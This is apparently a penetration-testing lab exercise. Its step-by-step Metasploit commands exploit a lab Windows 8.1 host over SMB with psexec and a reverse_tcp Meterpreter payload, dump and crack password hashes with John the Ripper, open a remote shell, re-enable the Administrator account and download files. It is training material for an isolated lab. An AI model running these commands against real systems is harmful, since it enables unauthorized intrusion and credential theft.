Exploiting desktop system vulns

 

Exploiting the Desktop Systems Vulnerabilities

Just like the network, hosts systems, which could be servers or desktops running a specific operating system, are bound to have vulnerabilities. An operating system like Windows contains millions of lines of codes, and there have been several vulnerabilities that have been discovered. Linux, even though open-source, has lesser vulnerabilities than Windows.

Several security researchers and attackers discover new vulnerabilities. Whereas security researchers inform the companies owning the operating system, the attackers may take advantage of these vulnerabilities and exploit them. There are hundreds of exploits available in the Metasploit Framework, and they can be used to exploit these vulnerabilities.

In this exercise, you will learn about exploiting the desktop system vulnerabilities.

Learning Outcomes

After completing this exercise, you will be able to:

• Switch Off the Windows Firewall on PLABWIN810
• Connect to a Windows Host and Launch the Exploit
• Open the Meterpreter Shell
• Extract and Crack the Password Hashes
• Work with the Windows Commands
• Enable a User Account
• Handle Services
• List the Existing User Accounts
• Download a File from Windows System

Your Devices

You will be using the following devices in this lab. Please power these on now.

• PLABDC01 - (Windows Server 2019 - Domain Server)
• PLABKALI01 - (Kali 2019.2 - Linux Kali)
• PLABWIN810 - (Windows 8.1 - Domain Member)

Task 1 - Switching Off the Windows Firewall on PLABWIN810

You will need to switch off the Windows Firewall to perform an attack on PLABWIN810. There are attacking methods that you can use to bypass the Windows or any other firewall running on the target. However, for the sake of this module, you will switch off the Windows Firewall and proceed with the remaining tasks.

To switch off the Windows Firewall on PLABWIN810, perform the following steps:

Step 1

Ensure that you have connected to PLABWIN810 and logged into the system.

Note that the PLABWIN810 desktop is displayed.

Figure 1.1 Screenshot of PLABWIN810: Showing the desktop of PLABWIN810.

Step 2

Right-click the Windows Charm and select Control Panel.

Figure 1.2 Screenshot of PLABWIN810: Right-clicking the Windows Charm and selecting Control Panel.

Step 3

The Control Panel window is displayed. On the Adjust your computer’s settings page, click System and Security.

Figure 1.3 Screenshot of PLABWIN810: Clicking System and Security on the Adjust your computer’s settings page.

Step 4

On the next page, several security-related options are displayed. Click Windows Firewall.

Figure 1.4 Screenshot of PLABWIN810: Clicking Windows Firewall.

Step 5

On the Help protect your PC with Windows Firewall page, click Turn Windows Firewall on or off in the left pane.

Figure 1.5 Screenshot of PLABWIN810: Clicking Turn Windows Firewall on or off in the left pane.

Step 6

On the Customize settings for each type of network page, select Turn off Windows Firewall (not recommended) for Domain, Private, and Public network.

Click OK.

Figure 1.6 Screenshot of PLABWIN810: Selecting Turn off Windows Firewall (not recommended) for Domain, Private, and Public network.

Step 7

On the Help protect your PC with Windows Firewall page, notice that Windows Firewall is now turned off for Domain, Private, and Public network.

Figure 1.7 Screenshot of PLABWIN810: Verifying the Windows Firewall status and closing the Control Panel.

Close the Control Panel window and the PLABWIN810 window.

Task 2 - Connect to a Windows Host and Launch the Exploit

PsExec is an exploit that you can use to gain access to a system if you know the credentials, which can be obtained by gaining access to the hashes. Once you are in the system, you can do several tasks, such as creating new user accounts or even launching malicious programs.

In this task, you will learn to connect to a Windows Host and Launch the Exploit. To do this, perform the following steps:

Alert: To perform these tasks on PLABWIN810, ensure you have switched off Windows Firewall.

Step 1

Ensure you have powered on all the devices listed in the introduction and connect to PLABKALI01.

On the desktop, click the Terminal icon.

Figure 1.7 Screenshot of PLABKALI01: Clicking the Terminal icon on the desktop.

On the terminal window displayed, type:

armitage

Alert: Please ensure that the first “a” in the name is lowercase. An uppercase “A” can throw an error.

Figure 1.8 Screenshot of PLABKALI01: Typing the Armitage command into the terminal window.

Step 3

The Connect dialog box is displayed. Keep the default values and click Connect.

Figure 1.9 Screenshot of PLABKALI01: Showing the Connect dialog box with the default values.

Step 4

The Start Metasploit? dialog box is displayed. Click Yes to run the Metasploit RPC server.

Figure 1.10 Screenshot of PLABKALI01: Showing the Start Metasploit? dialog box.

Step 5

The connection process starts.

Figure 1.11 Screenshot of PLABKALI01: Showing the Progress dialog box with the status of connecting to Metasploit.

Step 6

The Armitage window is now displayed. Notice that there is an msf5 prompt in the bottom pane.

Figure 1.12 Screenshot of PLABKALI01: Showing msf5 prompt in Armitage window.

Step 7

Next, you will connect to the victim’s system. To do this, click Hosts, select Nmap Scan and then select Quick Scan.

Figure 1.13 Screenshot of PLABKALI01: Selecting the Quick Scan option from the Hosts -> Nmap Scan option.

Step 8

The Input dialog box is displayed. In the Enter scan range text box, type the following IP address:

192.168.0.5

Click OK.

Figure 1.14 Screenshot of PLABKALI01: Entering the IP address in the Input dialog box.

Step 9

The Message dialog box is displayed. Click OK. The top-right pane displays a system with the 192.168.0.5 IP address.

Notice in the bottom pane, a new tab named nmap is opened. It displays the open ports on the 192.168.0.5 system, which is PLABWIN810.

Figure 1.15 Screenshot of PLABKALI01: Clicking OK on the Message dialog box.

Step 10

Next, you will prepare and launch the PsExec exploit. To do this, click Attacks and select Find Attacks.

Figure 1.16 Screenshot of PLABKALI01: Selecting Find Attacks from Attacks menu.

Step 11

The Message dialog box is displayed. Click OK.

Figure 1.17 Screenshot of PLABKALI01: Clicking OK on the Message dialog box.

Step 12

Click the Console tab in the bottom pane.

Figure 1.18 Screenshot of PLABKALI01: Clicking the Console tab in the bottom pane.

Step 13

You will now use the PsExec exploit. To do this, type the following command:

use exploit/windows/smb/ms17_010_psexec

Press Enter.

Figure 1.19 Screenshot of PLABKALI01: Entering the PsExec command at the msf5 prompt.

Step 14

Next, type the following command:

set RHOST 192.168.0.5

Press Enter.

Figure 1.20 Screenshot of PLABKALI01: Setting the remote host for exploitation.

Step 15

Next, set the LPORT option. Type the following command:

set LPORT 4444

Press Enter.

Figure 1.21 Screenshot of PLABKALI01: Setting the port on the local host.

Step 16

Now, you need to set the payload. Type the following command:

set payload windows/x64/meterpreter/reverse_tcp

Press Enter.

Figure 1.22 Screenshot of PLABKALI01: Setting the payload to exploit the remote host.

Step 17

You will now need to provide user credentials. To do this, type the following command:

set SMBUser admin

Press Enter.

Figure 1.23 Screenshot of PLABKALI01: Setting the SMBUser.

Step 18

You need to now set the password for the user. Type the following command:

set SMBPass Passw0rd

Press Enter.

Figure 1.24 Screenshot of PLABKALI01: Setting the password for the SMBUser.

Step 19

If you do not need the operating system target to be verified, then type the following command:

set VerifyTarget false

Press Enter.

Figure 1.25 Screenshot of PLABKALI01: Entering the command to bypass verifying the operating system target.

Step 20

Finally, type the following command:

run

Press Enter.

Figure 1.26 Screenshot of PLABKALI01: Running the exploit using the run command.

Step 21

After the run command completes, notice that a session with the victim’s system is now established.

In the top-right pane, notice that the victim’s system has a red border around it. This means that the victim’s system has been exploited.

Figure 1.27 Screenshot of PLABKALI01: Showing the established session with the victim and showing the victim’s system as exploited.

Keep the Armitage window open.

Task 3 - Opening the Meterpreter Shell

Meterpreter is a payload that is included in Metasploit. Using Meterpreter, you can do several tasks, such as explore the victim’s system, download files, or execute malicious code.

In this task, you will open the Meterpreter shell. To do this, perform the following steps:

Step 1

Ensure that you are connected to PLABKALI01, and Armitage window is open.

Right-click the System icon, select Meterpreter 1, select Interact, and then select Meterpreter Shell.

Figure 1.28 Screenshot of PLABKALI01: Selecting the Meterpreter Shell from the Meterpreter 1 -> Interact menu.

Step 2

Notice that a new tab with the name Meterpreter 1 is now opened in the bottom pane.

Figure 1.29 Screenshot of PLABKALI01: Showing the Meterpreter 1 tab.

Keep the Armitage window open.

Task 4 - Extracting and Cracking the Password Hashes

There are multiple methods that you can use to extract passwords from a Windows system. Metasploit also offers a method to extract the hashes and then crack them. In this task, you will learn to extract and crack the password hashes.

To extract and crack the password hashes, perform the following steps:

Step 1

Ensure that you are connected to PLABKALI01, and Armitage window is open.

To extract the hashes, type the following command:

run post/windows/gather/hashdump

Press Enter.

Figure 1.30 Screenshot of PLABKALI01: Entering the hashdump command to extract hashes from the exploited system.

Step 2

Notice that the passwords hashes have been extracted successfully.

Windows, by default, is installed with a few user accounts. These user accounts are:

• Guest: Has a default relative ID (RID) of 501.
• Administrator: Has the RID of 500.
• Krbtgt: Has the RID of 502.
• DefaultAccount: Has the RID of 503.
• WDAGUtilityAccount: Has the RID of 504.
• defaultuser(): Has the RID of 100x.

Other than these user accounts, you can always create as many user accounts as you like on a local system. However, it is important to note that the RIDs of the accounts cannot be changed. This stands true even if you change the name of the user account. For example, the default Administrator account can be renamed to LocalHead. Even when the name is changed, its RID will always remain the same, and this allows an attacker to identify the accounts.

Figure 1.31 Screenshot of PLABKALI01: Showing the extracted hashes from the exploited system.

Step 3

Highlight the hashes, right-click, and select Copy.

Figure 1.32 Screenshot of PLABKALI01: Selecting and copying the hashes.

Step 4

Minimize the Armitage window.

Click the Leafpad icon.

Figure 1.33 Screenshot of PLABKALI01: Clicking the Leafpad icon in the left pane.

Step 5

Right-click anywhere in the Leafpad window and select Paste.

Figure 1.34 Screenshot of PLABKALI01: Selecting the Paste option from the context menu.

Step 6

Notice that the hashes are now pasted. Press Ctrl + s to save the file.

Figure 1.35 Screenshot of PLABKALI01: Showing the pasted hashes in the text file and pressing Ctrl + s to save the file.

Step 7

The Save As dialog box is displayed. From the left pane, select Desktop. In the Name text box, type the following name:

hashes.txt

Click Save.

Figure 1.36 Screenshot of PLABKALI01: Showing the Save As dialog box to save the file as hashes.txt on the Desktop.

Step 8

Close the hashes.file.

Open a new Leafpad file.

Figure 1.37 Screenshot of PLABKALI01: Pressing the Ctrl + n keys to open a new text file.

Step 9

You will randomly add a few passwords. Even though there are several wordlists available in Kali Linux, you can also create your own.

Type the following:

password
Passw0rd
Password
Pass1234
1234Pass
P@ssw0rd
12345678

Press Ctrl + s to save the file.

Figure 1.38 Screenshot of PLABKALI01: Entering several passwords to create a new password wordlist.

Step 11

The Save As dialog box is displayed. From the left pane, select Desktop. In the Name text box, type the following name:

pass.txt

Click Save.

Close both the Leafpad documents.

Figure 1.39 Screenshot of PLABKALI01: Showing the Save As dialog box to save the file as pass.txt on the Desktop.

Step 12

Back on the desktop, notice both the text documents saved.

Click the Terminal icon.

Figure 1.40 Screenshot of PLABKALI01: Showing both the text files on the Desktop and clicking the Terminal icon in the left pane.

Step 13

You will now use John the Ripper to crack the hashes. To do this, type the following command:

john --wordlist=/root/Desktop/pass.txt --format=NT /root/Desktop/hashes.txt

Press Enter.

Figure 1.41 Screenshot of PLABKALI01: Entering the john command with the required parameters to crack the hashes.

Step 14

Within a few seconds, you are able to get the password for the user account Admin.

Figure 1.42 Screenshot of PLABKALI01: Showing the cracked hashes.

Close the terminal window.

Task 5 - Working with the Windows Commands

After you exploit a Windows system, there are several tasks that you can perform. Right from creating a file to uploading a malicious executable are possible.

To work with the Windows commands, perform the following steps:

Step 1

Ensure that you are connected to PLABKALI01, and Armitage window is open.

On the Meterpreter 1 tab, type the following command:

pwd

Press Enter.

Alert: The output for the command will not be displayed immediately. There will be a few seconds delay.

Figure 1.43 Screenshot of PLABKALI01: Entering the pwd command on the meterpreter console.

Step 2

Notice that the output displays C:\Windows\system32.

Figure 1.44 Screenshot of PLABKALI01: Showing the output of the pwd command.

Step 3

Let’s create a directory named plab in PLABWIN810. Type the following command:

mkdir c:\plab

Press Enter.

Figure 1.45 Screenshot of PLABKALI01: Entering the mkdir command to create a new directory named plab.

Step 4

Notice that the command has executed successfully.

Figure 1.46 Screenshot of PLABKALI01: Showing the output of the mkdir command.

Step 5

Switch over to PLABWIN810. You will verify if the plab directory is created.

The desktop of PLABWIN810 is displayed. Click the File Explorer icon.

Figure 1.47 Screenshot of PLABWIN810: Showing the desktop of the PLABWIN810 system.

Step 6

Double-click Local Disk (C:) in the right pane.

Figure 1.48 Screenshot of PLABWIN810: Double-clicking the C drive to open it.

Step 7

Notice that the plab directory is not created.

Figure 1.49 Screenshot of PLABWIN810: Showing the existing directories in the C drive.

Step 8

Switch back to PLABKALI01. Attempt to run the following commands:

clear
cls

Notice that both commands provide errors. This is because you are not using the Windows command prompt.

Figure 1.50 Screenshot of PLABKALI01: Entering the cls and clear command on the meterpreter prompt.

Step 9

To open a Windows command shell, type the following command:

shell

Press Enter.

Figure 1.51 Screenshot of PLABKALI01: Entering the shell command on the meterpreter prompt.

Step 10

Notice that the Windows command shell is invoked.

Note: If you attempt to create a directory or run the cls command, you will succeed.

Figure 1.52 Screenshot of PLABKALI01: Showing the Windows shell on a new tab named cmd.exe.

Keep the Armitage window open.

Task 6 - Enable a User Account

When a session is established with Windows for exploitation, you can also work with the user accounts. You can create user, delete, modify, or enable user accounts.

To enable a user account, perform the following steps:

Step 1

Ensure that you are connected to PLABWIN810. The desktop is displayed.

Right-click the Windows charm and select Computer Management.

Figure 1.53 Screenshot of PLABWIN810: Right-clicking the Windows charm and selecting Computer Management.

Step 2

In the left pane, select Local Users and Groups. The right pane displays two containers: Users and Groups.

Figure 1.54 Screenshot of PLABWIN810: Selecting Local Users and Groups in the left pane.

Step 3

Double-click Users.

Figure 1.55 Screenshot of PLABWIN810: Double-clicking Users in the middle pane.

Step 4

The users within the Users container are displayed. Notice that the Administrator account is disabled.

Minimize the Computer Management window.

Figure 1.56 Screenshot of PLABWIN810: Showing the existing user accounts in the middle pane and showing the Administrator account is disabled.

Step 5

Minimize PLABWIN810. Connect to PLABKALI01, and Armitage window is open.

Using the command prompt, you can always manipulate the Windows accounts. For example, you can execute the following command: net user guest /active: yes.

This command will activate the guest user account. When you exploit a system, you can find out the user accounts existing on the system by using the net user command. Assume this scenario in which an attacker activates the Guest user account and adds it to the local Administrators group. The owner of the exploited system will generally not imagine that the Guest user account holds the local administrator privileges.

On the Meterpreter 1 tab, type the following command:

Note: Ensure that you are on the C:\Windows\system32 prompt. If not, enter the shell command to get into this prompt.

net user administrator /active:yes

Press Enter.

Figure 1.57 Screenshot of PLABKALI01: Entering the command to activate the administrator account.

Step 6

Notice that you are prompted with an error stating that the password does not meet the complexity requirements.

Figure 1.58 Screenshot of PLABKALI01: Showing the error to activate the administrator account.

Step 7

You need first to reset the password so that it meets the password complexity policy. To reset the Administrator account password, type the following command:

net user administrator Passw0rd

Press Enter.

Figure 1.59 Screenshot of PLABKALI01: Entering the command to reset the administrator password.

Step 8

The password has been reset.

Figure 1.60 Screenshot of PLABKALI01: Showing the outcome of resetting the Administrator password.

Step 9

Once again, type the following command:

net user administrator /active:yes

Press Enter.

Figure 1.61 Screenshot of PLABKALI01: Entering a command to activate the Administrator account.

Step 10

Notice that the administrator account is now active.

Figure 1.62 Screenshot of PLABKALI01: Showing that the Administrator account is activated successfully.

Step 11

Connect to PLABWIN810. Ensure that the Computer Management window is open.

Notice that the Administrator account is now enabled.

Note: If you still see the Administrator account disabled, refresh the window.

Figure 1.63 Screenshot of PLABWIN810: Showing the activated Administrator’s account.

Close the Computer Management window.

Task 7 - Handling Services

After you connect with Windows using a session, you can virtually do anything. In the previous task, you learned to reset a password and enable a user account.

In this task, you will learn to handle services. To do this, perform the following steps:

Step 1

Ensure that you are connected to PLABKALI01, and Armitage window is open.

You can list the running services as well. On the cmd.exe tab, type the following command:

net start

Press Enter.

Figure 1.64 Screenshot of PLABKALI01: Entering the command to list the running services on the cmd.exe tab.

Step 3

A list of running services is displayed.

Figure 1.65 Screenshot of PLABKALI01: Listing the running services on the victim’s system.

Step 4

Let’s attempt to stop the Spooler service. To do this, type the following command:

sc stop “spooler”

Press Enter.

Figure 1.66 Screenshot of PLABKALI01: Entering the command to stop the Print Spooler service.

Step 5

Notice the output.

Figure 1.67 Screenshot of PLABKALI01: Showing the output of the net stop command.

Step 6

Let’s again start the Spooler service. To do this, type the following command:

net start “spooler”

Press Enter.

Figure 1.68 Screenshot of PLABKALI01: Entering the command to start the Print Spooler service.

Step 7

Notice that the Print Spooler service is now starting.

Figure 1.69 Screenshot of PLABKALI01: Showing the status of the Print Spooler service when attempting to start.

Step 8

Finally, the Print Spooler service starts.

Note: You might have to press Enter to display the updated status of the service.

Figure 1.70 Screenshot of PLABKALI01: Showing the status of Print Spooler service as started.

Keep the Armitage window open.

Task 8 - Listing the Existing User Accounts

You can also view the existing user accounts on a local system. This might come handy when you want to take advantage of an account.

To list the user accounts, perform the following steps:

Step 1

Ensure that you are connected to PLABKALI01, and Armitage window is open.

To list the existing user accounts on a system, type the following command:

net user

Press Enter.

Figure 1.71 Screenshot of PLABKALI01: Entering the command to list the user accounts on a system.

Step 2

The output of this command is displayed. Notice that there are three user accounts.

Figure 1.72 Screenshot of PLABKALI01: Showing the output of the net user command.

Step 3

Let’s go back to the Meterpreter prompt. Close the cmd.exe tab.

Figure 1.73 Screenshot of PLABKALI01: Closing the cmd.exe tab.

Keep the Armitage window open.

Task 9 - Download a File from Windows System

After you have exploited a Windows system, just like many other tasks, you can upload or download files using the Meterpreter payload. In this task, you will learn to download a file from PLABWIN810.

To do this, perform the following steps:

Step 1

Ensure that you are connected to PLABWIN810. The desktop is displayed. Click the File Explorer icon in the taskbar.

Figure 1.74 Screenshot of PLABWIN810: Clicking the File Explorer icon in the taskbar.

Step 2

In the This PC window, double-click Local Disk (C:).

Figure 1.75 Screenshot of PLABWIN810: Double-clicking the C Drive on PLABWIN810.

Step 3

In the right pane, right-click anywhere in the white space, select New and then select Text Document.

Figure 1.76 Screenshot of PLABWIN810: Selecting the New ( Text Document from the context menu in File Explorer.

Step 4

A new text document is created. Type the name as follows:

PLAB

Press Enter.

Figure 1.77 Screenshot of PLABWIN810: Entering the name as PLAB for the new text document.

Step 5

Connect to PLABKALI01, and Armitage window is open. Delete the previously typed command appearing at the prompt.

To download the plab.txt file, type the following command:

download c:\\plab.txt

Press Enter.

Figure 1.79 Screenshot of PLABKALI01: Entering a command to download the plab.txt file.

Step 6

Notice that the file is now downloaded.

Figure 1.80 Screenshot of PLABKALI01: Showing the plab.txt file downloaded successfully.

Keep all devices that you have powered on in their current state and proceed to the review section.